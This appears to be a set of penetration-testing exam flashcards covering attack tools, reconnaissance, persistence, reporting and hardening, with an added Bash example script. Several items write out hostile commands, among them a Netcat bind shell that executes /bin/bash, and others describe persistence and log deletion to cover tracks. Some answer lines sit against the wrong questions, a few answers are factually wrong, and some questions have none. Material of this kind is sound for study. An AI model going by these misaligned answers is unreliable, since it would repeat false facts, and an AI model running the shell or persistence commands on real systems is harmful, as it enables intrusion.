Which of the following can be used to perform brute-force password attacks? (Choose two.)
X11 forwarding
Which of the following can be used to remotely manage Linux systems over a network connection using a graphical user interface?
ARD
Which of the following can be used to remotely manage Macintosh systems over a network connection using a graphical user interface?
RDP
Which of the following can be used to remotely manage Windows systems over a network connection using a graphical user interface?
VNC
Which of the following can be used to remotely manage Windows, Macintosh, or Linux systems over a network connection using a graphical user interface (as long as the necessary software is installed)?
Wordlists
Which of the following can be used with John the Ripper to crack passwords?
Rainbow table attacks reduce compute cycles at attack time. Rainbow tables must include precompiled hashes.
Which of the following characteristics distinguish rainbow table attacks from brute-force attacks? (Choose two.)
The amount and kinds of risk an organization is willing to accept in its information systems environment
Which of the following choices best defines the term "risk appetite" with regard to information security?
nc -lvp 8899
Which of the following commands creates a listener on a system on port 8899?
python -m SimpleHTTPServer
Which of the following commands launches a simple HTTP web service that serves the files in the present working directory?
nmap -sS 10.1.1.1
Which of the following commands performs a TCP SYN scan?
DES RC4 MD5
Which of the following cryptographic algorithms should be avoided? (Select all that apply.)
Which of the following data sources is not a valid option in theharvester?
It lacks security controls. A malicious host can advertise itself as any host it wants to.
Which of the following describe the security risks associated with using the LLMNR protocol? (Choose two.)
It is used to enumerate DNS information about a given hostname or IP address. It is useful for passive reconnaissance. It can query several data sources, including Baidu, Google, LinkedIn, public Pretty Good Privacy (PGP) servers, Twitter, vhost, Virus Total, ThreatCrowd, CRTSH, Netcraft, Yahoo, and others.
Which of the following describes one of the uses of Theharvester?
The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell.
Which of the following describes what the nc -lvp 2233 -e /bin/bash command does?
Embedded devices Smart IoT appliances
Which of the following devices would probably have the weakest inherent security? (Choose two.)
Statement of work
Which of the following documents would detail the timeframe for which a penetration testing organization should retain copies of a report that it provided to a client?
#!/bin/bash
Which of the following elements must be included at the beginning of every Bash script?
A government contractor A multinational bank
Which of the following entities are most likely to become the target of an advanced persistent threat (APT)? (Choose two.)
EternalBlue WannaCry
Which of the following exploits are facilitated by weaknesses in the SMB protocol? (Choose two.)
Full Disclosure
Which of the following is a public, vendor-neutral forum and mailing list that publishes vulnerability analysis details, exploitation techniques, and other relevant information for the security community?
Seccomp
Which of the following is a sandbox built in the Linux kernel to only allow the write(), read(), exit(), and sigreturn() system calls?
Encrypt the file with AES-256, provide it to the declared recipients as detailed in your statement of work, and determine a secondary communication channel through which to send the decryption password (if not previously declared in the SOW)
Which of the following is a secure, reasonable method for the handling and disposition of a penetration test report?
LSASS
Which of the following is a service that runs on a Windows system and enforces the security policy of the system?
Static and dynamic binary analysis
Which of the following is a technique that is executed using disassemblers and decompilers to translate an app's binary code or bytecode back into a more or less understandable format?
SQLmap
Which of the following is a tool that can help automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection vulnerabilities?
Mimikatz
Which of the following is a tool used by many penetration testers, attackers, and even malware that can be useful for retrieving password hashes from memory and is also a very useful post-exploitation tool?
Enum4linux
Which of the following is a tool used to enumerate SMB shares, vulnerable Samba implementations, and corresponding users?
Ret2libc
Which of the following is a type of attack in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the executable memory of the process?
Race condition
Which of the following is a type of attack that takes place when a system or an application attempts to perform two or more operations at the same time?
Trojan
Which of the following is a type of malware that provides a useful function but secretly performs malicious actions when it is run?
PsExec
Which of the following is a utility that can be used on Windows systems that allows you to establish command-line access to the console of a remote Windows system, much like the older Telnet client?
Web Service Description Language (WSDL)
Which of the following is an XML-based interface definition language used to describe the functionality offered by a Simple Object Access Protocol (SOAP) server?
Host discovery
Which of the following is an active scanning technique used to aid in the process of information gathering, with the goal of identifying hosts that are alive and listening on the network?
Cold boot
Which of the following is an attack in which the attacker tries to retrieve encryption keys from a running operating system after using a system reload?
HTTP Strict Transport Security is not enabled on a system web application.
Which of the following is an example of a failure to apply best practices typical of those detailed in the results of a vulnerability scan?
Computer-controlled manufacturing equipment
Which of the following is an example of a nontraditional asset?
Web-enabled television monitor
Which of the following is an example of a nontraditional asset?
OS fingerprinting reveals a system running Windows XP SP2, suggesting susceptibility to MS08-067.
Which of the following is an example of a vulnerability identification that is typical of those detailed in the results of a vulnerability scan?
DVWA WebGoat Hackazon
Which of the following is an example of a vulnerable application that you can use to practice your penetration testing skills?
OWASP Zed Attack Proxy (ZAP) W3AF Burp Suite
Which of the following is an example of a web application penetration testing tool?
A web application's robots.txt file specifically denies all access to the /cgi-bin/ directory.
Which of the following is an example of an observation typical of those detailed in the results of a vulnerability scan?
Fuzzing a running web application with garbage input to assess the application's reaction
Which of the following is an example of dynamic application analysis?
Biometric scan + PIN
Which of the following is an example of multifactor authentication?
password + security token generator
Which of the following is an example of multifactor authentication?
Analyzing the written code for an application outside of an actively running instance
Which of the following is an example of static application analysis?
Username + PIN + fingerprint scan + one-time password (OTP)
Which of the following is an example of three-factor authentication (3FA)?
PIN + fingerprint scan + security token
Which of the following is an example of two-factor authentication (2FA)?
Shift
Which of the following is an external resource or API that may be installed in Maltego to expand its capabilities?
A tool that attempts to present threats in a normalized and standardized manner based on impact to the key tenets of confidentiality, integrity, and availability, such as the CVSS
Which of the following is the best choice available for a vulnerability severity rating scale when writing a penetration test report?
Send spoofed emails to the staff to see if they will respond with sensitive information.
Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect?
Tailgating
Which of the following is the term for an unauthorized individual following an authorized individual to enter a restricted building or facility?
In DOM-based XSS, the payload is never sent to the server. Instead, the payload is only processed by the web client (browser).
Which of the following is true about DOM-based XSS?
Metasploit was created using the Ruby programming language. You can use Ruby to create exploits, scripts, and modules in Metasploit.
Which of the following is true about Metasploit?
Shodan is an organization that continuously scans the Internet and exposes its results to users via its website. Attackers can use this tool to identify vulnerable and exposed systems on the Internet (such as misconfigured IoT devices and infrastructure devices). Penetration testers can use this tool to gather information about potentially vulnerable systems exposed to the Internet without actively scanning their victims.
Which of the following is true about Shodan?
Clickjacking involves using multiple transparent or opaque layers to induce a user to click on a web button or link on a page that he or she did not intend to navigate to or click. Clickjacking attacks are often referred to as "UI redress attacks." User keystrokes can also be hijacked using clickjacking techniques. It is possible to launch a clickjacking attack by using a combination of CSS stylesheets, iframes, and text boxes to fool the user into entering information or clicking on links in an invisible frame that could be rendered from a site an attacker created.
Which of the following is true about clickjacking?
Reflected XSS attacks are not persistent.
Which of the following is true about reflected XSS?
A restricted deletion flag, or sticky bit, is a single bit whose interpretation depends on the file type. For directories, the sticky bit prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories such as /tmp. For regular files on some older systems, the sticky bit saves the program's text image on the swap device so it will load more quickly when run.
Which of the following is true about sticky bits?
SET
Which of the following is typically not used as a post-exploitation tool?
RPC/DCOM
Which of the following is used on Windows systems to allow you to remotely execute code on another Windows system somewhere else in the network?
Using unsecure file and folder permissions
Which of the following issues could enable a penetration tester to execute a DLL hijacking exploit on a Windows system?
Database
Which of the following items must be cleaned up during post-engagement activities when a web application test includes SQL injection?
Install extra system RAM and then disable the Windows paging file. Disable unneeded services.
Which of the following methods are commonly used to harden Windows-based computer systems? (Choose two.)
Enable and configure iptables.
Which of the following methods is commonly used to harden Linux-based server systems?
Enable the secure shell (SSH) service.
Which of the following methods is commonly used to harden Linux-based server systems?
Disable autorun.
Which of the following methods is commonly used to harden Windows-based computer systems?
Close all ports in the Windows firewall and then open only those needed by installed services.
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
Restrict network access to only authenticated users.
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
CSRF
Which of the following occurs when a user who is authenticated by an application through a cookie saved in the browser unwittingly sends an HTTP request to a site that trusts the user, subsequently triggering an unwanted action?
Empire PowerSploit
Which of the following penetration tools are based on Windows PowerShell? (Choose two.)
Network Access Control (NAC)
Which of the following prevents unauthorized or unhealthy devices from connecting to a network, even if they connect to the wired or wireless network properly?
HTTP
Which of the following protocols is the Representational State Transfer (REST) web application architecture based on?
WMI
Which of the following provides an infrastructure for managing Windows systems over the network from a centralized location?
FIPS 140-2
Which of the following provides standards that certify cryptographic modules?
cPassword
Which of the following refers to the name of the attribute that stores passwords in a Windows Group Policy Preference item?
Explicit detailing of terms and conditions that are previously agreed to trigger a shift in goal priorities in the engagement's statement of work or rules of engagement A client request to expend additional effort on a previously identified vulnerable system rather than begin testing on a separate subnet
Which of the following represent examples of goal reprioritization? (Choose all that apply.)
Which of the following search engines is not used by FOCA when searching for documents?
reg save HKLM\System\CurrentControlSet\Services\Sv.reg
Which of the following should be used if a penetration tester is attempting to achieve persistence by compromising a Windows server?
Embedding an XSS payload on an intranet site that is widely used within the organization for incident management and reporting
Which of the following social engineering attacks is an example of waterholing?
Attackers can use rainbow tables to accelerate password cracking. Rainbow tables, which are precomputed tables for reversing cryptographic hash functions, can be used to derive a password by looking at the hashed value. A tool called RainbowCrack can be used to automate the cracking of passwords using rainbow tables.
Which of the following statements are true? (Select all that apply.)
That the corporate systems must store passwords using the MD5 hashing algorithm
Which of the following statements would come from a client's corporate policy?
Deleting temporary files Deleting application logs Suppressing syslog messages
Which of the following tasks helps you cover your tracks to remain undetected?
Schedule jobs using cron to run exploit scripts or start daemons.
Which of the following techniques can be used to establish persistence during a penetration test that involves Linux systems?
Using scheduled tasks Using DLL hijacking
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.)
Credential brute-forcing
Which of the following techniques involves sending one password after another at an authentication system in an attempt to find the right one?
Dictionary attack
Which of the following techniques involves sending passwords, one after another, from a list of commonly used passwords in an attempt to find the right one?
Normalization of data
Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?
Malicious insider
Which of the following threat actors exploits the trust that has been legitimately granted to them by an organization to compromise that organization's information or systems?
Script kiddie
Which of the following threat actors is probably the least dangerous based on the adversary tier list?
Organized crime Nation-state actor
Which of the following threat actors typically have the financial resources and technical expertise required to develop their own extensive exploits? (Choose two.)
Script kiddie
Which of the following threat actors typically lacks the technical expertise to develop their own exploits and must rely on prewritten code downloaded from the Internet?
Script kiddie, hacktivist, malicious insider, organized crime, nation-state
Which of the following tiers of adversaries ranks threat actors, generally speaking, from least threatening to most threatening?
Sysinternals ProcDump
Which of the following tools allows an attacker to dump the LSASS process from memory to disk?
foremost FTK
Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.)
Findsecbugs YASCA
Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.)
AFL Peach
Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.)
Nikto
Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance?
Socat Twittor DNSCat2
Which of the following tools can be used for command and control?
Recon-ng Maltego
Which of the following tools can be used to automate open source intelligence (OSINT) gathering? (Select all that apply.)
at Task Scheduler
Which of the following tools can be used to automatically run tasks on a Windows system without your intervention? (Choose two.)
APK Studio APKX
Which of the following tools can be used to debug or decompile an Android executable? (Choose two.)
CeWL
Which of the following tools can be used to generate a wordlist?
WMI
Which of the following tools can be used to perform many data-gathering operations and can be used by malware to perform different activities in a compromised system?
A rainbow table
Which of the following tools can be used to restore the original plain text password from the hash of that password?
Piggybacking
Which of the following types of physical security attacks does a mantrap utilize?
Nikto W3AF
Which of the following utilities can be categorized as vulnerability scanners? (Choose two.)
CSRF or XSRF
Which of the following vulnerabilities can be exploited with the parameters used in the following URL? http://h4cker.org/resource/?password_new=newpasswd&password_conf=newpasswd&Change=Change#
The psexec module found in Metasploit (exploit/windows/smb/psexec), Windows Sysinternals, or Core Security's impacket suite
Which of the following would allow a penetration tester to execute arbitrary commands against a Windows target with either an open SMB share or a closed SMB share when providing authorized credentials?
Using SSHv1 instead of SSHv2 Using SSL 2.0 instead of TLS 1.2
Which of the following would be considered an unsecure service or protocol configuration? (Choose two.)
Targeting the CFO with an SMS attack
Which one of the following is an instance of a spear phishing attack?
CAPEC
Which open source research source is a community-developed common database that contains descriptions of commonly used cyberattack patterns?
CWE
Which open source research source is a community-developed common database that contains vulnerabilities and exposures associated with software in general instead of a specific vendor's product?
CVE
Which open source research source is a community-developed common database used by industry vendors worldwide to submit vulnerabilities and exposures associated with their products?
JPCERT
Which open source research source is maintained by the Japanese government and provides a dynamic summary of current security alerts and advisories?
CERT
Which open source research source is maintained by the U.S. government and provides a dynamic summary of the most frequent, high-impact types of security incidents currently being reported?
NVD
Which open source research source is maintained by the U.S. government's National Institute of Science and Technology and provides a summary of current security?
Full Disclosure
Which open source research source is published by the organization that produces the nmap utility?
NVD
Which open source research source ranks security vulnerabilities by their severity?
Nmap
Which open-source command-line tool is used for several penetration test-focused activities on both wired and wireless networks, such as surveying hosts for open ports, fingerprinting operating systems, and collecting service banners?
-oA
Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once?
Badge cloning
Which penetration testing technique uses a high-gain antenna to pull information from employee RFID access cards, which may then be copied later to blank cards for use by a penetration tester?
Impacket
Which penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB?
Searchsploit
Which penetration testing tool is a command-line search tool for the online Exploit-DB database of known exploits?
Metasploit Framework
Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization's network?
BeEF
Which penetration testing utility is focused on exploiting web browsers?
JTAG
Which physical hardware standard was designed to allow manufacturers to connect to completed embedded systems and printed circuit boards in order to facilitate debugging and other testing, but can be leveraged by attackers or penetration testers to obtain information or shell access to a given device to which they have physical access?
Fence jumping
Which physical penetration testing practice is used to obtain unauthorized access to an area that has been cordoned off and, in the broadest sense, effectively describes methods used to entirely bypass access control mechanisms?
Security guards
Which physical security mechanism introduces a human element to a physical penetration testing scenario and is one of many reasons to establish a solid pretext before beginning a physical penetration testing engagement?
Mantrap
Which physical security mechanism serves as an access control point by using multiple sets of doors, which can both prevent unauthorized access to an inner boundary and contain an individual attempting to breach security after they pass through the first door?
Kismet
Which popular tool is used for wireless discovery and offers many of the same features as airodump-ng?
UDP 161
Which port is used by the SNMP protocol?
20 21
Which ports are used by an FTP server? (Choose two.)
139 445
Which ports are used by the SMB protocol? (Choose two.)
Follow-up actions/retesting
Which post-report delivery activity is focused on executing any additional assessment work that may be desired by the client or required based on terms defined in the engagement's statement of work?
Debriefing/closing meeting
Which post-report delivery activity is focused on identifying any patterns within the types of vulnerabilities discovered in an organization's networks during a penetration test, and the identification of broader knowledge that can be gained from the specific details of the penetration test results?
sudo
Which program can you use as a standard user on a Linux system to execute programs as root?
Lock bypass
Which range of techniques allows locksmiths and physical penetration testers to disengage a lock's latching mechanism without operating the lock at all, such as by opening a car door with a slim jim or using a thin metal shim to unlatch padlocks?
show modules
Which recon-ng command can be used to identify available modules for intelligence collection?
-ge
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other?
-gt
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other?
-le
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other?
-lt
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other?
>=
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other?
>
Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other?
<=
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other?
<
Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other?
ncat
Which remote access tool was created by the organization that developed nmap as an updated version of the netcat utility that supports encrypted data tunnels?
Appendixes
Which section of a penetration test report consists of supplemental material that is related to the report but is not critical for the purposes of understanding its contents? Examples may include nmap scan results, automated scan output, or other code written or deployed in the course of the penetration test.
Methodology
Which section of a penetration test report details broad, strategic information about testing techniques and practices used as well as the decision-making processes that guided information collection, analysis, and risk evaluation?
Findings and remediation
Which section of a penetration test report details discovered vulnerabilities, explains the risk they carry, and provides appropriate recommendations to secure the system in question?
Executive summary
Which section of a written report of penetration test findings is intended to be read by less-technical audiences?
Directory transversal
Which security misconfiguration on a web server would allow an end user accessing the site with a web browser to navigate through the web server's file system?
Cookie manipulation
Which security misconfiguration would allow a script run by the user's web browser to write data to a client-side cookie?
WPS
Which security standard was designed to simplify the connection process for consumer devices and home wireless networks but is vulnerable to remote attack if the PIN feature is enabled (default setting on many home routers) or local attacks if the wireless access point is not kept physically secured?
Phishing
Which social engineering attack vector may broadly be considered a remote attempt to elicit information or a desired action, but also necessarily includes technical components such as spam, web filter, and firewall evaluation?
Interrogation
Which social engineering technique involves questioning an employee using intimidation to gather information?
Interrogation
Which social engineering technique is least likely to be used during a penetration test?
Shodan
Which static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process, and can greatly aid penetration testers in the data-mining process?
Architecture overview
Which step in Microsoft's published guidance on threat modeling consists of documenting the technologies in use in the architecture of an information systems environment and discovering how they are implemented therein?
Beacon frame
Which subtype of management frame contains details about a wireless access point (including but not limited to the SSID, encryption details, MAC address, and Wi-Fi channel) that can enable a malicious agent to eavesdrop on a wireless network?
Architecture diagram
Which support resource details an organization's network or software design and infrastructure as well as defines the relationships between those elements?
Serial console
Which system access method is typically used by systems administrators to interact with systems that are locked up or unresponsive over the network, but can often be leveraged by an attacker with physical proximity to a system to obtain information or reset system passwords, such as by rebooting a Linux server into single-user mode?
DNS zone transfer
Which technique is used during passive reconnaissance to map a user-defined hostname to the IP address or addresses with which it is associated?
Deauthentication attack
Which technique is used in attacking wireless access points or the devices connecting to them, forcing client devices to disconnect from a network momentarily?
Tailgating
Which technique used in physical penetration testing aims to obtain unauthorized access to a secured location, frequently by exploiting the helpfulness or kindness of legitimate employees?
Vulnerability mapping
Which term describes the process of detailing identified security flaws and their locations?
Bluesnarfing
Which term is used to describe attacks that leverage a device's Bluetooth connection to steal information?
Rooting; jailbreaking
Which terms describe the process of enabling low-level execution of user applications with elevated privileges in mobile environments? (Choose two.)
Script kiddie
Which threat actor is most likely to be motivated by a desire to gain attention?
Hacktivist
Which threat actor is most likely to be motivated by a political cause?
APK Studio
Which tool for Android is a reverse engineering framework with a graphical interface, code editor, and an APK signing feature that allows users to modify and repackage code as needed?
Dradis
Which tool included in Kali is most helpful in compiling a quality penetration testing report?
MobSF
Which tool is an all-in-one, automated penetration testing framework for mobile applications for Android, iOS, and Windows mobile platforms, providing SAST for Android, iOS, and Windows mobile devices and DAST for Android platforms?
reaver
Which tool is used specifically to attack WPS-enabled networks, exploiting a weakness in WPS that enables attackers to brute-force the PIN used to obtain a WPA password?
Red team
Which type of assessment is marked by a longer-than-typical engagement time and significant risk or cost to the organization without effective expectation management?
SSL stripping
Which type of exploit fools a web server into presenting a user's web browser with an HTTP connection instead of an HTTPS connection as the user originally requested?
Single-factor authentication
Which type of finding weakens overall security posture by reducing the difficulty of compromising legitimate user credentials?
Weak password complexity requirements
Which type of finding weakens security posture by leaving user passwords more susceptible to cracking or online brute-force attempts?
Gray box assessment
Which type of penetration test best focuses the tester's time and efforts while still providing an approximate view of what a real attacker would see?
Black box assessment
Which type of penetration test best replicates the perspective of a real-world attacker?
Black box
Which type of penetration test best simulates an outsider attack?
Black box
Which type of penetration test requires the most time and money to conduct?
White box assessment
Which type of penetration test usually provides the most thorough assessment in the least amount of time?
FTP:14147
While footprinting an organization for a penetration test, you discover that a service it relies on uses FTP across port 14147 for data transfers. How could you refine a Shodan search to only reveal FTP servers on that port?
CeWL
While performing a black box penetration test, the tester wants to crawl the target organization's website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file?
Capture the FTP traffic with a sniffer.
While performing a black box penetration test, you identify a significant amount of FTP data being transferred between an unknown internal host on the target network and hosts on the Internet on ports 20 and 21. How could you exploit this traffic to gain access to systems on the target network?
The internal system administrator isn't paying attention to this server.
While performing a black box penetration test, you notice that the target organization has a public-facing server that has an expired SSL/TLS security certificate. What could you infer from this fact?
Research the Common Vulnerabilities and Exposures (CVE) database.
While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You've fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization's wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do?
Pass the hash
While performing a gray box penetration test, the tester discovers that several Linux workstations in the network have not been joined to the organization's Active Directory domain, even though they have the Samba service installed. To access shared folders on Windows servers, these workstations use NT LAN Manager (NTLM) connections. The tester captures hashed user credentials as they are passed between workstations and servers and then reuses them later to establish new authenticated sessions with the file servers. What is this exploit called?
Remove all users created during testing phases; record all activities performed on a compromised system
While performing a penetration test, you are successful in compromising a system you are testing and are able to create your own user on the system. What actions should you take during and after the test to address post-engagement activities? (Select all that apply.)
CVE
While performing enumeration and fingerprinting during a gray box penetration test, you discover that the documentation and training department in the target organization stores its files on a Windows Server 2003 system that is still at the SP2 patch level because nobody bothers to update it. You want to investigate ways that this older server can be exploited. Which open source research source could you use?
A description of what kind of report will be provided to the client when the test is complete; a remediation timeline that provides an estimate of how long it will take to bring their systems into compliance
While planning an upcoming penetration test, your client has requested that you include a description of the end state of the assessment in the project scope. What kind of information should be included in this description? (Choose two.)
Badge cloning
While waiting in line at a food truck behind an employee of the target organization, a penetration tester steals her access badge and makes a copy of its RFID signature on a fake access badge. What is this technique called?
Implementation of patching and change control programs
While working on a penetration test report for a client organization, you note that there were numerous discrepancies in software package versions installed on business-critical servers. How might this issue best be mitigated?
Search for additional personnel with experience in enterprise-level information security and network architecture
While working on a penetration test report, you note repeatedly that security best practices are often not enforced, and that there seems to be no overarching design philosophy with regard to organization or network expansion. Which of the following would be an appropriate mitigation strategy to recommend for this scenario?
Deploy a hardware firewall to prevent unrestricted movement in the network; enforce network segmentation
While writing a penetration test report, you note that security monitoring by the client seems to revolve around SMS alerts driven by log aggregation. Issues logged seem well tended but you further note that you did not have any issue moving laterally in the environment, as you did not encounter any network segregation or network flow control measures. Which of the following would be good recommendations for mitigation of these issues? (Choose all that apply.)
A timeline for the engagement; a review of laws that specifically govern the target
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements must be included? (Choose two.)
To avoid taking down a system or service through effectively running a denial-of-service attack, or to avoid detection by not tripping log sensors or other alerts
Why might it be necessary to throttle queries to a target system during a penetration test?
Single-factor authentication reduces the complexity of obtaining access to a target system. Multifactor authentication often is required by compliance guidelines.
Why should multifactor authentication be used and encouraged instead of single-factor methods? (Choose all that apply.)
They transmit data as clear text over the network.
Why should you avoid using utilities such as Telnet, rlogin, and rsh when conducting a penetration test?
The penetration tester is only provided with initial, basic connectivity to target systems.
With respect to penetration testing conducted behind perimeter defenses, what does it mean to be provided limited access?
tail /var/log/firewall 1> lastevents 2>&1
Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this?
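The following script is an added example, not part of the original flashcards. It exercises the Bash integer comparison operators (-lt, -le, -gt, -ge) from the cards above in a realistic helper, and it packages the "1>file 2>&1" redirection from the last card into a reusable function, including the ordering rule that makes "2>&1" work. The function names and the sample command are my own choices for the example.

```shell
#!/bin/sh
# Added example (not from the original flashcards): Bash integer comparison
# operators -lt, -le, -gt, -ge plus the "1>file 2>&1" redirection form.
# Function names are chosen for this example.

# classify_port PORT
# Prints the IANA range a port number falls in. Non-numeric or out-of-range
# input is rejected first, so the integer tests never see garbage.
classify_port() {
    port=$1
    case $port in
        ''|*[!0-9]*) echo "invalid"; return 1 ;;   # empty or contains a non-digit
    esac
    if [ "$port" -gt 65535 ]; then
        echo "invalid"; return 1
    elif [ "$port" -le 1023 ]; then                          # 0-1023
        echo "well-known"
    elif [ "$port" -ge 1024 ] && [ "$port" -lt 49152 ]; then # 1024-49151
        echo "registered"
    else                                                     # 49152-65535
        echo "dynamic"
    fi
}

# capture_both LOGFILE CMD [ARGS...]
# Runs CMD with stdout redirected to LOGFILE and stderr duplicated onto it.
# Redirections are applied left to right, so "2>&1" must come AFTER
# "1>LOGFILE"; the reversed order "2>&1 1>LOGFILE" would leave stderr on the
# terminal. The command's exit status is returned unchanged.
capture_both() {
    logfile=$1
    shift
    "$@" 1>"$logfile" 2>&1
}

# Stand-alone demonstration. The flashcard's own command would be
#   capture_both lastevents tail /var/log/firewall
# Here a constructed command writes one line to each stream instead.
demo() {
    tmp=$(mktemp)
    capture_both "$tmp" sh -c 'echo "stdout line"; echo "stderr line" >&2'
    echo "captured $(grep -c . "$tmp") lines:"
    cat "$tmp"
    rm -f "$tmp"
    for p in 22 443 1024 8080 49152 65535 70000 telnet; do
        echo "$p -> $(classify_port "$p")"
    done
}
demo
```

The same `-ge`/`-le` spellings work in PowerShell (`if ($port -ge 1024 -and $port -le 49151)`), which is why the cards group the two shells together; only the bracket syntax differs.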
Technology
You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. The organization might also filter out any messages containing high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?
A man-in-the-middle attack
You and a colleague are discussing different types of attacks. In one type of attack, communications between two parties are intercepted and forwarded, and neither party is aware that an interception took place. What type of attack is being discussed?
Cross-site scripting (XSS)
You and a colleague are discussing different types of attacks. One such attack is a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser. What type of attack is this describing?
Computer Emergency Response Team (CERT)
You and a colleague are discussing open source intelligence (OSINT), and the conversation turns to vulnerabilities and other security flaws. A number of organizations work to centralize this knowledge. One of them tackles a broad range of cybersecurity activities, focusing on security breach and denial-of-service incidents and providing alerts as well as incident-handling and avoidance guidelines. Which organization are we discussing?
The Common Attack Pattern Enumeration and Classification (CAPEC)
You and a colleague are discussing open source intelligence (OSINT), and the conversation turns to vulnerabilities and other security flaws. A number of organizations work to centralize this knowledge. One of them maintains a list intended to help identify and document attacks and attack patterns. Users can search attacks by mechanism or domain, and each attack is broken down by its attributes and prerequisites. Which organization are we discussing?
Time of check to time of use (TOCTTOU)
You and a colleague are discussing race condition exploitation. Which one of the following is an example of a race condition?
Something you have
You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?
The removal of any tools used; the removal of shells; the removal of tester-created credentials
You are a penetration tester and are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)
Setting up a schedule of testing times to access their systems
You are a penetration tester and are discussing with a client the properties of the testing engagement agreement. Which one of the following will have the biggest impact on the observation and testing of the client's production systems during their peak loads?
Certificate pinning
You are a penetration tester and have been asked to test an organization that uses an authentication method that associates hosts with their public keys. What type of authentication technique is the organization using?
Credentialed scan
You are a penetration tester and have been scanning a network. The vulnerability scanner that you are utilizing is using a service access level to better evaluate vulnerabilities across multiple assets within an organization. What is being performed?
Attempt RID cycling to enumerate users and groups.
You are a penetration tester and have found a vulnerability in the client's domain controller. The vulnerability is that null sessions are enabled on the domain controller. What type of attack can be performed to take advantage of this vulnerability?
The organization did not disable Telnet.
You are a penetration tester and have run the following Nmap scan on a computer: nmap -sV 192.168.10.5. The client indicated that it had disabled Telnet from its environment. However, the Nmap scan results show that port 22 is closed and that port 23 is open to SSH. What might have happened to cause this?
The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack?
$ports = 20, 25, 80, 443
You are a penetration tester and want to create an array using a PowerShell script. Which lines of code would you use?
Scope creep
You are a penetration tester, and a company has asked you to perform a web application penetration test. The company has asked you to discover any vulnerabilities. The company has now come to you and asked if you will review additional code and check for updates to firewall settings. What is the client asking you to do?
Expand the password length from seven to 14 characters and add special characters.
You are a penetration tester, and after performing a recent test, you discover that the client's staff is using dictionary and seasonal passwords. What is the best way to control the use of common dictionary words as being used as passwords?
HKEY_CURRENT_USER
You are a penetration tester, and while conducting a test, you are trying to maintain persistence on a Windows system that has limited privileges. What registry key should you use?
During lessons learned
You are a penetration tester, and while doing a cleanup after a penetration test, it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?
A full scan
You are a penetration tester, and you are conducting a black box penetration test against your client's network and are in the process of gathering vulnerability scanning results. What type of scan will provide you with important information within the scope of your testing?
Sqlmap
You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you?
A read-only account
You are a penetration tester, and you are configuring your vulnerability management solution to perform credentialed scans of servers on your client's network. What type of account should you be provided with?
Findings can assist an attacker in compromising a system.
You are a penetration tester, and you are discussing with the client the importance of maintaining confidentiality of any findings when performing a penetration test. Why is it important to maintain confidentiality when performing penetration tests?
To run it on different architectures
You are a penetration tester, and you are looking to cross-compile code for your penetration activity. Then you plan to deploy it. Why would you cross-compile code?
A session cookie
You are a penetration tester, and you are looking to start a session hijacking attack against a client's web application. What information is important to obtain to ensure that your attack will be a success?
The service set identifiers (SSIDs)
You are a penetration tester, and you are performing an on-site penetration test. What scoping element do you need to know for a wireless assessment when working on-site in a shared building?
CeWL
You are a penetration tester, and you are planning to create a custom wordlist of common words and catchphrases about your client using the client's website. What is the name of the tool that you can utilize to assist with building a custom wordlist?
They should disable any unnecessary services.
You are a penetration tester, and you have been asked by a client to test the security of several web servers. You are able to gain access to the root/administrator on several of the servers by exploiting vulnerabilities related to the use of DNS, FTP, IMAP, POP, SMTP, and Telnet. What should you recommend to your client regarding how to better protect their web servers?
TCP SYNs to TCP port 80
You are a penetration tester, and you plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see when you use this command: hping remoteclient.com -S -V -p 80?
Mimikatz
